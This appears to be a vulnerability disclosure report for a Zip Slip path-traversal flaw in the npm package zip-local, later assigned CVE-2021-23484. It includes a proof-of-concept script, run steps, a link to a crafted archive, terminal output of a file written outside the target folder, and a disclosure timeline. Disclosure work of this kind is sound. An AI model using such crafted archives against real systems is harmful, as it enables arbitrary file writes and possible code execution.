Relative Path Traversal in mostafa-samir/zip-local
Valid
Reported on
Oct 13th 2021
Description
zip-local is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip).
Proof of Concept
// PoC.js
var zipper = require('zip-local');
zipper.unzip("zipslip.zip", function(error, unzipped) {
if(!error) {
// extract to the current working directory
unzipped.save(null, function() { });
var unzippedfs = unzipped.memory();
}
});
Execute the following commands
1. npm install zip-local # Install affected module
2. zipslip example file can be found at - https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip
3. node poc.js # Run the PoC
Will extract "good.txt" to current directory and "evil.txt" to /tmp directory
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls
CHANGELOG.md LICENSE node_modules poc.js tests
libs main.js package.json README.md zipslip.zip
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ node poc.js
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls
CHANGELOG.md LICENSE package.json tests
good.txt main.js poc.js zipslip.zip
libs node_modules README.md
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp
evil.txt
Impact
It may lead to Information Disclosure/DoS/RCE.
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
2 years ago
7he6uzzer modified the report
2 years ago
We have contacted a member of the
mostafa-samir/zip-local
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
mostafa-samir/zip-local
team.
We will try again in 7 days.
2 years ago
We have sent a
second
follow up to the
mostafa-samir/zip-local
team.
We will try again in 10 days.
2 years ago
We have sent a
third and final
follow up to the
mostafa-samir/zip-local
team.
This report is now considered stale.
2 years ago
Got assigned with CVE-2021-23484. Thanks @Mostafa Samir and @zidingz 🎉
to join this conversation